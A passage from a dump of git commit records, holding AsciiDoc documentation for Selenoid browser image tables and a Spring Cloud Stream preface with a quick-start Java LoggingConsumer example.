capability:\n[source,javascript]\n{\"browserName\": \"opera\", \"operaOptions\": {\"binary\": \"\/usr\/bin\/opera\"}}\n\nWe do not consider these images really stable. Many of base operations like working with proxies may not work.\n====\n\n.Opera Blink Images\n|===\n| Image | VNC Image | Operadriver version | Opera version\n\n| selenoid\/opera:33.0 | selenoid\/vnc:opera_33.0 | 0.2.2 | 33.0.1990.115 \n| selenoid\/opera:34.0 | selenoid\/vnc:opera_34.0 | 0.2.2 | 34.0.2036.50 \n| selenoid\/opera:35.0 | selenoid\/vnc:opera_35.0 | 0.2.2 | 35.0.2066.92 \n| selenoid\/opera:36.0 | selenoid\/vnc:opera_36.0 | 0.2.2 | 36.0.2130.65 \n| selenoid\/opera:37.0 | selenoid\/vnc:opera_37.0 | 0.2.2 | 37.0.2178.54 \n| selenoid\/opera:38.0 | selenoid\/vnc:opera_38.0 | 0.2.2 | 38.0.2220.41 \n| selenoid\/opera:39.0 | selenoid\/vnc:opera_39.0 | 0.2.2 | 39.0.2256.71 \n| selenoid\/opera:40.0 | selenoid\/vnc:opera_40.0 | 0.2.2 | 40.0.2308.90 \n| selenoid\/opera:41.0 | selenoid\/vnc:opera_41.0 | 2.27 | 41.0.2353.69 \n| selenoid\/opera:42.0 | selenoid\/vnc:opera_42.0 | 2.27 | 42.0.2393.94 \n| selenoid\/opera:43.0 | selenoid\/vnc:opera_43.0 | 2.27 | 43.0.2442.991 \n| selenoid\/opera:44.0 | selenoid\/vnc:opera_44.0 | 2.27 | 44.0.2510.857\n| selenoid\/opera:45.0 | selenoid\/vnc:opera_45.0 | 2.27 | 45.0.2552.635\n| selenoid\/opera:46.0 | selenoid\/vnc:opera_46.0 | 2.27 | 46.0.2597.26\n| selenoid\/opera:47.0 | selenoid\/vnc:opera_47.0 | 2.29 | 47.0.2631.39\n| selenoid\/opera:48.0 | selenoid\/vnc:opera_48.0 | 2.30 | 48.0.2685.35\n| selenoid\/opera:49.0 | selenoid\/vnc:opera_49.0 | 2.32 | 49.0.2725.39\n| selenoid\/opera:50.0 | selenoid\/vnc:opera_50.0 | 2.32 | 50.0.2762.45\n| selenoid\/opera:51.0 | selenoid\/vnc:opera_51.0 | 2.33 | 51.0.2830.26\n| selenoid\/opera:52.0 | selenoid\/vnc:opera_52.0 | 2.35 | 52.0.2871.37\n| selenoid\/opera:53.0 | selenoid\/vnc:opera_53.0 | 2.36 | 53.0.2907.68\n| selenoid\/opera:54.0 | selenoid\/vnc:opera_54.0 | 2.37 | 54.0.2952.46\n| selenoid\/opera:55.0 | selenoid\/vnc:opera_55.0 | 2.37 | 55.0.2994.37\n| selenoid\/opera:56.0 | selenoid\/vnc:opera_56.0 | 2.40 | 56.0.3051.31\n| selenoid\/opera:57.0 | selenoid\/vnc:opera_57.0 | 2.41 | 57.0.3098.76\n| selenoid\/opera:58.0 | selenoid\/vnc:opera_58.0 | 2.42 | 58.0.3135.79\n| - | - | - | 59.0.x.x (no stable release exists)\n| selenoid\/opera:60.0 | selenoid\/vnc:opera_60.0 | 2.45 | 60.0.3255.56\n|===\n\n[NOTE]\n====\n. These images work with any modern Selenium client version.\n. Images for older Opera versions were not built because we have no Debian packages. If you have such packages - we could create more images.\n====\n\n=== Android\n\nWARNING: Hardware server or virtual machine with nested virtualization support is required to run Android images.\n\n.Android Images\n|===\n| Image | Android version | Appium version\n\n| selenoid\/android:4.4 | 4.4 | 1.8.1 \n| selenoid\/android:5.1 | 5.1 | 1.8.1 \n| selenoid\/android:6.0 | 6.0 | 1.8.1 \n| selenoid\/android:7.0 | 7.0 | 1.8.1 \n| selenoid\/android:7.1 | 7.1 | 1.8.1 \n| selenoid\/android:8.0 | 8.0 | 1.8.1 \n| selenoid\/android:8.1 | 8.1 | 1.8.1 \n|===\n\n[NOTE]\n====\n. These images include VNC server and Android Quick Boot snapshot.\n. Neither Chromedriver nor Chrome Mobile are installed. To test hybrid apps build your own image using provided automation script.\n====\n","old_contents":"== Browser Image information\n=== Firefox\n\n.Firefox Images with Selenium Server\n|===\n| Image | VNC Image | Selenium Version | Firefox Version | Client Version\n\n| selenoid\/firefox:3.6 | selenoid\/vnc:firefox_3.6 | 2.20.0 | 3.6.16 i386 (dialogs may not work) .7+<.^|\n**Java:** 2.53.1 and below\n**Python:** not supported\n**selenium-webdriver.js:** not supported\n| selenoid\/firefox:4.0 | selenoid\/vnc:firefox_4.0 | 2.20.0 | 4.0.1 i386\n| selenoid\/firefox:5.0 | selenoid\/vnc:firefox_5.0 | 2.20.0 | 5.0.1 i386\n| selenoid\/firefox:6.0 | selenoid\/vnc:firefox_6.0 | 2.20.0 | 6.0.2 i386\n| selenoid\/firefox:7.0 | selenoid\/vnc:firefox_7.0 | 2.20.0 | 7.0.1 i386\n| selenoid\/firefox:8.0 | selenoid\/vnc:firefox_8.0 | 2.20.0 | 8.0.1 i386\n| selenoid\/firefox:9.0 | selenoid\/vnc:firefox_9.0 | 2.20.0 | 9.0.1\n| selenoid\/firefox:10.0 | selenoid\/vnc:firefox_10.0 | 2.32.0 | 10.0.2 .13+<.^|\n**Java:** any modern version\n**Python:** not supported\n**selenium-webdriver.js:** not supported\n| selenoid\/firefox:11.0 | selenoid\/vnc:firefox_11.0 | 2.32.0 | 11.0\n| selenoid\/firefox:12.0 | selenoid\/vnc:firefox_12.0 | 2.32.0 | 12.0\n| selenoid\/firefox:13.0 | selenoid\/vnc:firefox_13.0 | 2.32.0 | 13.0\n| selenoid\/firefox:14.0 | selenoid\/vnc:firefox_14.0 | 2.32.0 | 14.0.1\n| selenoid\/firefox:15.0 | selenoid\/vnc:firefox_15.0 | 2.32.0 | 15.0.1\n| selenoid\/firefox:16.0 | selenoid\/vnc:firefox_16.0 | 2.32.0 | 16.0.2\n| selenoid\/firefox:17.0 | selenoid\/vnc:firefox_17.0 | 2.32.0 | 17.0.1\n| selenoid\/firefox:18.0 | selenoid\/vnc:firefox_18.0 | 2.32.0 | 18.0.2\n| selenoid\/firefox:19.0 | selenoid\/vnc:firefox_19.0 | 2.32.0 | 19.0.2\n| selenoid\/firefox:20.0 | selenoid\/vnc:firefox_20.0 | 2.32.0 | 20.0\n| selenoid\/firefox:21.0 | selenoid\/vnc:firefox_21.0 | 2.32.0 | 21.0\n| selenoid\/firefox:22.0 | selenoid\/vnc:firefox_22.0 | 2.32.0 | 22.0\n| selenoid\/firefox:23.0 | selenoid\/vnc:firefox_23.0 | 2.35.0 | 23.0.1 .25+<.^| Any modern client version\n| selenoid\/firefox:24.0 | selenoid\/vnc:firefox_24.0 | 2.39.0 | 24.0\n| selenoid\/firefox:25.0 | selenoid\/vnc:firefox_25.0 | 2.39.0 | 25.0.1\n| selenoid\/firefox:26.0 | selenoid\/vnc:firefox_26.0 | 2.39.0 | 26.0\n| selenoid\/firefox:27.0 | selenoid\/vnc:firefox_27.0 | 2.40.0 | 27.0.1\n| selenoid\/firefox:28.0 | selenoid\/vnc:firefox_28.0 | 2.41.0 | 28.0\n| selenoid\/firefox:29.0 | selenoid\/vnc:firefox_29.0 | 2.43.1 | 29.0.1\n| selenoid\/firefox:30.0 | selenoid\/vnc:firefox_30.0 | 2.43.1 | 30.0 \n| selenoid\/firefox:31.0 | selenoid\/vnc:firefox_31.0 | 2.44.0 | 31.0 \n| selenoid\/firefox:32.0 | selenoid\/vnc:firefox_32.0 | 2.44.0 | 32.0.3 \n| selenoid\/firefox:33.0 | selenoid\/vnc:firefox_33.0 | 2.44.0 | 33.0.3 \n| selenoid\/firefox:34.0 | selenoid\/vnc:firefox_34.0 | 2.45.0 | 34.0.5 \n| selenoid\/firefox:35.0 | selenoid\/vnc:firefox_35.0 | 2.45.0 | 35.0.1 \n| selenoid\/firefox:36.0 | selenoid\/vnc:firefox_36.0 | 2.45.0 | 36.0.1 \n| selenoid\/firefox:37.0 | selenoid\/vnc:firefox_37.0 | 2.45.0 | 37.0.2 \n| selenoid\/firefox:38.0 | selenoid\/vnc:firefox_38.0 | 2.45.0 | 38.0.5 \n| selenoid\/firefox:39.0 | selenoid\/vnc:firefox_39.0 | 2.45.0 | 39.0.3 \n| selenoid\/firefox:40.0 | selenoid\/vnc:firefox_40.0 | 2.45.0 | 40.0.3 \n| selenoid\/firefox:41.0 | selenoid\/vnc:firefox_41.0 | 2.45.0 | 41.0.2 \n| selenoid\/firefox:42.0 | selenoid\/vnc:firefox_42.0 | 2.47.1 | 42.0 \n| selenoid\/firefox:43.0 | selenoid\/vnc:firefox_43.0 | 2.53.1 | 43.0.4 \n| selenoid\/firefox:44.0 | selenoid\/vnc:firefox_44.0 | 2.53.1 | 44.0.2 \n| selenoid\/firefox:45.0 | selenoid\/vnc:firefox_45.0 | 2.53.1 | 45.0.2 \n| selenoid\/firefox:46.0 | selenoid\/vnc:firefox_46.0 | 2.53.1 | 46.0.1 \n| selenoid\/firefox:47.0 | selenoid\/vnc:firefox_47.0 | 2.53.1 | 47.0.1 \n|===\n\nWARNING: Firefox 53.0+ images require Selenium client 3.4.0 or newer.\n\n.Firefox Images with Selenoid\n|===\n| Image | VNC Image | Selenoid Version | Geckodriver Version | Firefox Version | Client Version\n\n| selenoid\/firefox:48.0 | selenoid\/vnc:firefox_48.0 | 1.3.9 | 0.13.0 | 48.0.2 (page load timeout, native events and proxies don't work) .19+<.^|\n**Java, selenium-webdriver.js**: 3.4.0 and above\n**Python**: 3.5.0 and above \n| selenoid\/firefox:49.0 | selenoid\/vnc:firefox_49.0 | 1.3.9 | 0.13.0 | 49.0.2 (page load timeout, native events and switching between windows don't work) \n| selenoid\/firefox:50.0 | selenoid\/vnc:firefox_50.0 | 1.3.9 | 0.13.0 | 50.0.2 (page load timeout, native events, switching windows and proxies don't work) \n| selenoid\/firefox:51.0 | selenoid\/vnc:firefox_51.0 | 1.3.9 | 0.14.0 | 51.0.1 (page load timeout, native events, switching windows and proxies don't work) \n| selenoid\/firefox:52.0 | selenoid\/vnc:firefox_52.0 | 1.3.9 | 0.15.0 | 52.0.2 (page load timeout, native events, switching windows and proxies don't work) \n| selenoid\/firefox:53.0 | selenoid\/vnc:firefox_53.0 | 1.3.9 | 0.16.0 | 53.0.2 (switching windows may not work)\n| selenoid\/firefox:54.0 | selenoid\/vnc:firefox_54.0 | 1.3.9 | 0.17.0 | 54.0.1 (switching windows may not work) \n| selenoid\/firefox:55.0 | selenoid\/vnc:firefox_55.0 | 1.3.9 | 0.18.0 | 55.0.1 (switching windows may not work) \n| selenoid\/firefox:56.0 | selenoid\/vnc:firefox_56.0 | 1.3.9 | 0.19.1 | 56.0.1 \n| selenoid\/firefox:57.0 | selenoid\/vnc:firefox_57.0 | 1.3.9 | 0.19.1 | 57.0 \n| selenoid\/firefox:58.0 | selenoid\/vnc:firefox_58.0 | 1.6.0 | 0.20.1 | 58.0\n| selenoid\/firefox:59.0 | selenoid\/vnc:firefox_59.0 | 1.6.0 | 0.20.1 | 59.0.1\n| selenoid\/firefox:60.0 | selenoid\/vnc:firefox_60.0 | 1.6.2 | 0.21.0 | 60.0.2\n| selenoid\/firefox:61.0 | selenoid\/vnc:firefox_61.0 | 1.6.2 | 0.21.0 | 61.0\n| selenoid\/firefox:62.0 | selenoid\/vnc:firefox_62.0 | 1.7.2 | 0.22.0 | 62.0\n| selenoid\/firefox:63.0 | selenoid\/vnc:firefox_63.0 | 1.8.1 | 0.23.0 | 63.0\n| selenoid\/firefox:64.0 | selenoid\/vnc:firefox_64.0 | 1.8.4 | 0.23.0 | 64.0\n| selenoid\/firefox:65.0 | selenoid\/vnc:firefox_65.0 | 1.9.0 | 0.24.0 | 65.0\n| selenoid\/firefox:66.0 | selenoid\/vnc:firefox_66.0 | 1.9.1 | 0.24.0 | 66.0.1\n|===\n\n\n=== Chrome\n\n.Chrome Images\n|===\n| Image | VNC Image | Chromedriver version | Chrome version\n\n| selenoid\/chrome:48.0 | selenoid\/vnc:chrome_48.0 | 2.21 | 48.0.2564.116 \n| selenoid\/chrome:49.0 | selenoid\/vnc:chrome_49.0 | 2.22 | 49.0.2623.112 \n| selenoid\/chrome:50.0 | selenoid\/vnc:chrome_50.0 | 2.22 | 50.0.2661.102 \n| selenoid\/chrome:51.0 | selenoid\/vnc:chrome_51.0 | 2.23 | 51.0.2704.106 \n| selenoid\/chrome:52.0 | selenoid\/vnc:chrome_52.0 | 2.24 | 52.0.2743.116 \n| selenoid\/chrome:53.0 | selenoid\/vnc:chrome_53.0 | 2.26 | 53.0.2785.143 \n| selenoid\/chrome:54.0 | selenoid\/vnc:chrome_54.0 | 2.27 | 54.0.2840.100 \n| selenoid\/chrome:55.0 | selenoid\/vnc:chrome_55.0 | 2.28 | 55.0.2883.87 \n| selenoid\/chrome:56.0 | selenoid\/vnc:chrome_56.0 | 2.29 | 56.0.2924.87 \n| selenoid\/chrome:57.0 | selenoid\/vnc:chrome_57.0 | 2.29 | 57.0.2987.110 \n| selenoid\/chrome:58.0 | selenoid\/vnc:chrome_58.0 | 2.29 | 58.0.3029.81 \n| selenoid\/chrome:59.0 | selenoid\/vnc:chrome_59.0 | 2.30 | 59.0.3071.86 \n| selenoid\/chrome:60.0 | selenoid\/vnc:chrome_60.0 | 2.31 | 60.0.3112.90\n| selenoid\/chrome:61.0 | selenoid\/vnc:chrome_61.0 | 2.32 | 61.0.3163.79\n| selenoid\/chrome:62.0 | selenoid\/vnc:chrome_62.0 | 2.33 | 62.0.3202.62\n| selenoid\/chrome:63.0 | selenoid\/vnc:chrome_63.0 | 2.33 | 63.0.3239.84\n| selenoid\/chrome:64.0 | selenoid\/vnc:chrome_64.0 | 2.35 | 64.0.3282.119\n| selenoid\/chrome:65.0 | selenoid\/vnc:chrome_65.0 | 2.38 | 65.0.3325.181\n| selenoid\/chrome:66.0 | selenoid\/vnc:chrome_66.0 | 2.38 | 66.0.3359.117\n| selenoid\/chrome:67.0 | selenoid\/vnc:chrome_67.0 | 2.39 | 67.0.3396.62\n| selenoid\/chrome:68.0 | selenoid\/vnc:chrome_68.0 | 2.41 | 68.0.3440.106\n| selenoid\/chrome:69.0 | selenoid\/vnc:chrome_69.0 | 2.42 | 69.0.3497.100\n| selenoid\/chrome:70.0 | selenoid\/vnc:chrome_70.0 | 2.44 | 70.0.3538.110\n| selenoid\/chrome:71.0 | selenoid\/vnc:chrome_71.0 | 2.44 | 71.0.3578.80\n| selenoid\/chrome:72.0 | selenoid\/vnc:chrome_72.0 | 2.46 | 72.0.3626.121\n| selenoid\/chrome:73.0 | selenoid\/vnc:chrome_73.0 | 73.0.3683.68 | 73.0.3683.75\n|===\n\n[NOTE]\n====\n. These images work with any modern Selenium client version.\n. Images for older Chrome versions were not built because we have no Debian packages. If you have such packages - we could create more images.\n====\n\n=== Opera\n\n.Opera Presto Images\n|===\n| Image | VNC Image | Selenium version | Opera version\n\n| selenoid\/opera:12.16 | selenoid\/vnc:opera_12.16 | 2.37.0 | 12.16.1860 (dialogs and probably async JS don't work)\n|===\n\n[WARNING]\n====\nDue to bug in *Operadriver* to work with *Opera Blink* images you need to pass additional capability:\n[source,javascript]\n{\"browserName\": \"opera\", \"operaOptions\": {\"binary\": \"\/usr\/bin\/opera\"}}\n\nWe do not consider these images really stable. Many of base operations like working with proxies may not work.\n====\n\n.Opera Blink Images\n|===\n| Image | VNC Image | Operadriver version | Opera version\n\n| selenoid\/opera:33.0 | selenoid\/vnc:opera_33.0 | 0.2.2 | 33.0.1990.115 \n| selenoid\/opera:34.0 | selenoid\/vnc:opera_34.0 | 0.2.2 | 34.0.2036.50 \n| selenoid\/opera:35.0 | selenoid\/vnc:opera_35.0 | 0.2.2 | 35.0.2066.92 \n| selenoid\/opera:36.0 | selenoid\/vnc:opera_36.0 | 0.2.2 | 36.0.2130.65 \n| selenoid\/opera:37.0 | selenoid\/vnc:opera_37.0 | 0.2.2 | 37.0.2178.54 \n| selenoid\/opera:38.0 | selenoid\/vnc:opera_38.0 | 0.2.2 | 38.0.2220.41 \n| selenoid\/opera:39.0 | selenoid\/vnc:opera_39.0 | 0.2.2 | 39.0.2256.71 \n| selenoid\/opera:40.0 | selenoid\/vnc:opera_40.0 | 0.2.2 | 40.0.2308.90 \n| selenoid\/opera:41.0 | selenoid\/vnc:opera_41.0 | 2.27 | 41.0.2353.69 \n| selenoid\/opera:42.0 | selenoid\/vnc:opera_42.0 | 2.27 | 42.0.2393.94 \n| selenoid\/opera:43.0 | selenoid\/vnc:opera_43.0 | 2.27 | 43.0.2442.991 \n| selenoid\/opera:44.0 | selenoid\/vnc:opera_44.0 | 2.27 | 44.0.2510.857\n| selenoid\/opera:45.0 | selenoid\/vnc:opera_45.0 | 2.27 | 45.0.2552.635\n| selenoid\/opera:46.0 | selenoid\/vnc:opera_46.0 | 2.27 | 46.0.2597.26\n| selenoid\/opera:47.0 | selenoid\/vnc:opera_47.0 | 2.29 | 47.0.2631.39\n| selenoid\/opera:48.0 | selenoid\/vnc:opera_48.0 | 2.30 | 48.0.2685.35\n| selenoid\/opera:49.0 | selenoid\/vnc:opera_49.0 | 2.32 | 49.0.2725.39\n| selenoid\/opera:50.0 | selenoid\/vnc:opera_50.0 | 2.32 | 50.0.2762.45\n| selenoid\/opera:51.0 | selenoid\/vnc:opera_51.0 | 2.33 | 51.0.2830.26\n| selenoid\/opera:52.0 | selenoid\/vnc:opera_52.0 | 2.35 | 52.0.2871.37\n| selenoid\/opera:53.0 | selenoid\/vnc:opera_53.0 | 2.36 | 53.0.2907.68\n| selenoid\/opera:54.0 | selenoid\/vnc:opera_54.0 | 2.37 | 54.0.2952.46\n| selenoid\/opera:55.0 | selenoid\/vnc:opera_55.0 | 2.37 | 55.0.2994.37\n| selenoid\/opera:56.0 | selenoid\/vnc:opera_56.0 | 2.40 | 56.0.3051.31\n| selenoid\/opera:57.0 | selenoid\/vnc:opera_57.0 | 2.41 | 57.0.3098.76\n| selenoid\/opera:58.0 | selenoid\/vnc:opera_58.0 | 2.42 | 58.0.3135.79\n| - | - | - | 59.0.x.x (no stable release exists)\n| selenoid\/opera:60.0 | selenoid\/vnc:opera_60.0 | 2.45 | 60.0.3255.56\n|===\n\n[NOTE]\n====\n. These images work with any modern Selenium client version.\n. Images for older Opera versions were not built because we have no Debian packages. If you have such packages - we could create more images.\n====\n\n=== Android\n\nWARNING: Hardware server or virtual machine with nested virtualization support is required to run Android images.\n\n.Android Images\n|===\n| Image | Android version | Appium version\n\n| selenoid\/android:4.4 | 4.4 | 1.8.1 \n| selenoid\/android:5.1 | 5.1 | 1.8.1 \n| selenoid\/android:6.0 | 6.0 | 1.8.1 \n| selenoid\/android:7.0 | 7.0 | 1.8.1 \n| selenoid\/android:7.1 | 7.1 | 1.8.1 \n| selenoid\/android:8.0 | 8.0 | 1.8.1 \n| selenoid\/android:8.1 | 8.1 | 1.8.1 \n|===\n\n[NOTE]\n====\n. These images include VNC server and Android Quick Boot snapshot.\n. Neither Chromedriver nor Chrome Mobile are installed. To test hybrid apps build your own image using provided automation script.\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"44f114e4e71992e2574cc79797e2b603aea9436e","subject":"Polishing docs","message":"Polishing docs\n","repos":"garyrussell\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream,ilayaperumalg\/spring-cloud-stream,ilayaperumalg\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream,spring-cloud\/spring-cloud-stream","old_file":"docs\/src\/main\/asciidoc\/preface.adoc","new_file":"docs\/src\/main\/asciidoc\/preface.adoc","new_contents":"=== A Brief History of Spring's Data Integration Journey\n\nSpring's journey on Data Integration started with https:\/\/projects.spring.io\/spring-integration\/[Spring Integration]. With its programming model, it provided a consistent developer experience to build applications that can embrace http:\/\/www.enterpriseintegrationpatterns.com\/[Enterprise Integration Patterns] to connect with external systems such as, databases, message brokers, and among others.\n\nFast forward to the cloud-era, where microservices have become prominent in the enterprise setting. https:\/\/projects.spring.io\/spring-boot\/[Spring Boot] transformed the way how developers built Applications. With Spring's programming model and the runtime responsibilities handled by Spring Boot, it became seamless to develop stand-alone, production-grade Spring-based microservices.\n\nTo extend this to Data Integration workloads, Spring Integration and Spring Boot were put together into a new project. Spring Cloud Stream was born.\n\n[%hardbreaks]\nWith Spring Cloud Stream, developers can:\n* Build, test, iterate, and deploy data-centric applications in isolation.\n* Apply modern microservices architecture patterns, including composition through messaging.\n* Decouple application responsibilities with event-centric thinking. An event can represent something that has happened in time, to which the downstream consumer applications can react without knowing where it originated or the producer's identity.\n* Port the business logic onto message brokers (such as RabbitMQ, Apache Kafka, Amazon Kinesis).\n* Interoperate between channel-based and non-channel-based application binding scenarios to support stateless and stateful computations by using Project Reactor's Flux and Kafka Streams APIs.\n* Rely on the framework's automatic content-type support for common use-cases. Extending to different data conversion types is possible.\n\n=== Quick Start\n\nYou can try Spring Cloud Stream in less then 5 min even before you jump into any details by following this three-step guide.\n\nWe show you how to create a Spring Cloud Stream application that receives messages coming from the messaging middleware of your choice (more on this later) and logs received messages to the console.\nWe call it `LoggingConsumer`.\nWhile not very practical, it provides a good introduction to some of the main concepts\nand abstractions, making it easier to digest the rest of this user guide.\n\nThe three steps are as follows:\n\n. <<spring-cloud-stream-preface-creating-sample-application>>\n. <<spring-cloud-stream-preface-importing-project>>\n. <<spring-cloud-stream-preface-adding-message-handler>>\n\n[[spring-cloud-stream-preface-creating-sample-application]]\n==== Creating a Sample Application by Using Spring Initializr\nTo get started, visit the https:\/\/start.spring.io[Spring Initializr]. From there, you can generate our `LoggingConsumer` application. To do so:\n\n. In the *Dependencies* section, start typing `stream`.\nWhen the \"`Cloud Stream`\" option should appears, select it.\n. Start typing either 'kafka' or 'rabbit'.\n. Select \"`Kafka`\" or \"`RabbitMQ`\".\n+\nBasically, you choose the messaging middleware to which your application binds.\nWe recommend using the one you have already installed or feel more comfortable with installing and running.\nAlso, as you can see from the Initilaizer screen, there are a few other options you can choose.\nFor example, you can choose Gradle as your build tool instead of Maven (the default).\n. In the *Artifact* field, type 'logging-consumer'.\n+\nThe value of the *Artifact* field becomes the application name.\nIf you chose RabbitMQ for the middleware, your Spring Initializr should now be as follows:\n\n[%hardbreaks]\n[%hardbreaks]\n[%hardbreaks]\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/spring-initializr.png[align=\"center\"]\n\n[%hardbreaks]\n[%hardbreaks]\n\n. Click the *Generate Project* button.\n+\nDoing so downloads the zipped version of the generated project to your hard drive.\n. Unzip the file into the folder you want to use as your project directory.\n\nTIP: We encourage you to explore the many possibilities available in the Spring Initializr.\nIt lets you create many different kinds of Spring applications.\n\n[[spring-cloud-stream-preface-importing-project]]\n==== Importing the Project into Your IDE\n\nNow you can import the project into your IDE.\nKeep in mind that, depending on the IDE, you may need to follow a specific import procedure.\nFor example, depending on how the project was generated (Maven or Gradle), you may need to follow specific import procedure (for example, in Eclipse or STS, you need to use File -> Import -> Maven -> Existing Maven Project).\n\nOnce imported, the project must have no errors of any kind. Also, `src\/main\/java` should contain `com.example.loggingconsumer.LoggingConsumerApplication`.\n\nTechnically, at this point, you can run the application's main class.\nIt is already a valid Spring Boot application.\nHowever, it does not do anything, so we want to add some code.\n\n[[spring-cloud-stream-preface-adding-message-handler]]\n==== Adding a Message Handler, Building, and Running\n\nModify the `com.example.loggingconsumer.LoggingConsumerApplication` class to look as follows:\n\n[source, java]\n----\n@SpringBootApplication\npublic class LoggingConsumerApplication {\n\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(LoggingConsumerApplication.class, args);\n\t}\n\n\t@Bean\n\tpublic Consumer<Person> log() {\n\t return person -> {\n\t System.out.println(\"Received: \" + person);\n\t };\n\t}\n\n\tpublic static class Person {\n\t\tprivate String name;\n\t\tpublic String getName() {\n\t\t\treturn name;\n\t\t}\n\t\tpublic void setName(String name) {\n\t\t\tthis.name = name;\n\t\t}\n\t\tpublic String toString() {\n\t\t\treturn this.name;\n\t\t}\n\t}\n}\n----\n\nAs you can see from the preceding listing:\n\n* We are using functional programming model (see <<Spring Cloud Function support>>) to define a single message handler as `Consumer`.\n* We are relying on framework conventions to bind such handler to the input destination binding exposed by the binder.\n\nDoing so also lets you see one of the core features of the framework: It tries to automatically convert incoming message payloads to type `Person`.\n\nYou now have a fully functional Spring Cloud Stream application that does listens for messages.\nFrom here, for simplicity, we assume you selected RabbitMQ in <<spring-cloud-stream-preface-creating-sample-application,step one>>.\nAssuming you have RabbitMQ installed and running, you can start the application by running its `main` method in your IDE.\n\nYou should see following output:\n\n[source]\n----\n\t--- [ main] c.s.b.r.p.RabbitExchangeQueueProvisioner : declaring queue for inbound: input.anonymous.CbMIwdkJSBO1ZoPDOtHtCg, bound to: input\n\t--- [ main] o.s.a.r.c.CachingConnectionFactory : Attempting to connect to: [localhost:5672]\n\t--- [ main] o.s.a.r.c.CachingConnectionFactory : Created new connection: rabbitConnectionFactory#2a3a299:0\/SimpleConnection@66c83fc8. . .\n\t. . .\n\t--- [ main] o.s.i.a.i.AmqpInboundChannelAdapter : started inbound.input.anonymous.CbMIwdkJSBO1ZoPDOtHtCg\n\t. . .\n\t--- [ main] c.e.l.LoggingConsumerApplication : Started LoggingConsumerApplication in 2.531 seconds (JVM running for 2.897)\n----\n\nGo to the RabbitMQ management console or any other RabbitMQ client and send a message to `input.anonymous.CbMIwdkJSBO1ZoPDOtHtCg`.\nThe `anonymous.CbMIwdkJSBO1ZoPDOtHtCg` part represents the group name and is generated, so it is bound to be different in your environment.\nFor something more predictable, you can use an explicit group name by setting `spring.cloud.stream.bindings.input.group=hello` (or whatever name you like).\n\nThe contents of the message should be a JSON representation of the `Person` class, as follows:\n\n\t{\"name\":\"Sam Spade\"}\n\nThen, in your console, you should see:\n\n`Received: Sam Spade`\n\nYou can also build and package your application into a boot jar (by using `.\/mvnw clean install`) and run the built JAR by using the `java -jar` command.\n\nNow you have a working (albeit very basic) Spring Cloud Stream application.\n\n== What's New in 3.0?\n\n\n[[spring-cloud-stream-preface-new-features]]\n=== New Features and Enhancements\n\n- *Routing Function* - see <<Routing with functions>> for more details.\n- *Multiple bindings with functions* (multiple message handlers) - see <<Multiple functions in a single application>> for more details.\n- *Functions with multiple inputs\/outputs* (single function that can subscribe or target multiple destinations) - see <<Functions with multiple input and output arguments>> for more details.\n- *Native support for reactive programming* - since v3.0.0 we no longer distribute spring-cloud-stream-reactive modules and instead\nrelying on native reactive support provided by spring cloud function. For backward\ncompatibility you can still bring `spring-cloud-stream-reactive` from previous versions.\n\n\n[[spring-cloud-stream-preface-notable-deprecations]]\n=== Notable Deprecations\n\n- _Reactive module_ (`spring-cloud-stream-reactive`) is discontinued and no longer distributed in favor of native support via spring-cloud-function.\nFor backward\ncompatibility you can still bring `spring-cloud-stream-reactive` from previous versions.\n- _Test support binder_ `spring-cloud-stream-test-support` with MessageCollector in favor of a new test binder. See <<Testing>> for more details.\n- _@StreamMessageConverter_ - deprecated as it is no longer required.\n- The `original-content-type` header references have been removed after it's been deprecated in v2.0.\n","old_contents":"=== A Brief History of Spring's Data Integration Journey\n\nSpring's journey on Data Integration started with https:\/\/projects.spring.io\/spring-integration\/[Spring Integration]. With its programming model, it provided a consistent developer experience to build applications that can embrace http:\/\/www.enterpriseintegrationpatterns.com\/[Enterprise Integration Patterns] to connect with external systems such as, databases, message brokers, and among others.\n\nFast forward to the cloud-era, where microservices have become prominent in the enterprise setting. https:\/\/projects.spring.io\/spring-boot\/[Spring Boot] transformed the way how developers built Applications. With Spring's programming model and the runtime responsibilities handled by Spring Boot, it became seamless to develop stand-alone, production-grade Spring-based microservices.\n\nTo extend this to Data Integration workloads, Spring Integration and Spring Boot were put together into a new project. Spring Cloud Stream was born.\n\n[%hardbreaks]\nWith Spring Cloud Stream, developers can:\n* Build, test, iterate, and deploy data-centric applications in isolation.\n* Apply modern microservices architecture patterns, including composition through messaging.\n* Decouple application responsibilities with event-centric thinking. An event can represent something that has happened in time, to which the downstream consumer applications can react without knowing where it originated or the producer's identity.\n* Port the business logic onto message brokers (such as RabbitMQ, Apache Kafka, Amazon Kinesis).\n* Interoperate between channel-based and non-channel-based application binding scenarios to support stateless and stateful computations by using Project Reactor's Flux and Kafka Streams APIs.\n* Rely on the framework's automatic content-type support for common use-cases. Extending to different data conversion types is possible.\n\n=== Quick Start\n\nYou can try Spring Cloud Stream in less then 5 min even before you jump into any details by following this three-step guide.\n\nWe show you how to create a Spring Cloud Stream application that receives messages coming from the messaging middleware of your choice (more on this later) and logs received messages to the console.\nWe call it `LoggingConsumer`.\nWhile not very practical, it provides a good introduction to some of the main concepts\nand abstractions, making it easier to digest the rest of this user guide.\n\nThe three steps are as follows:\n\n. <<spring-cloud-stream-preface-creating-sample-application>>\n. <<spring-cloud-stream-preface-importing-project>>\n. <<spring-cloud-stream-preface-adding-message-handler>>\n\n[[spring-cloud-stream-preface-creating-sample-application]]\n==== Creating a Sample Application by Using Spring Initializr\nTo get started, visit the https:\/\/start.spring.io[Spring Initializr]. From there, you can generate our `LoggingConsumer` application. To do so:\n\n. In the *Dependencies* section, start typing `stream`.\nWhen the \"`Cloud Stream`\" option should appears, select it.\n. Start typing either 'kafka' or 'rabbit'.\n. Select \"`Kafka`\" or \"`RabbitMQ`\".\n+\nBasically, you choose the messaging middleware to which your application binds.\nWe recommend using the one you have already installed or feel more comfortable with installing and running.\nAlso, as you can see from the Initilaizer screen, there are a few other options you can choose.\nFor example, you can choose Gradle as your build tool instead of Maven (the default).\n. In the *Artifact* field, type 'logging-consumer'.\n+\nThe value of the *Artifact* field becomes the application name.\nIf you chose RabbitMQ for the middleware, your Spring Initializr should now be as 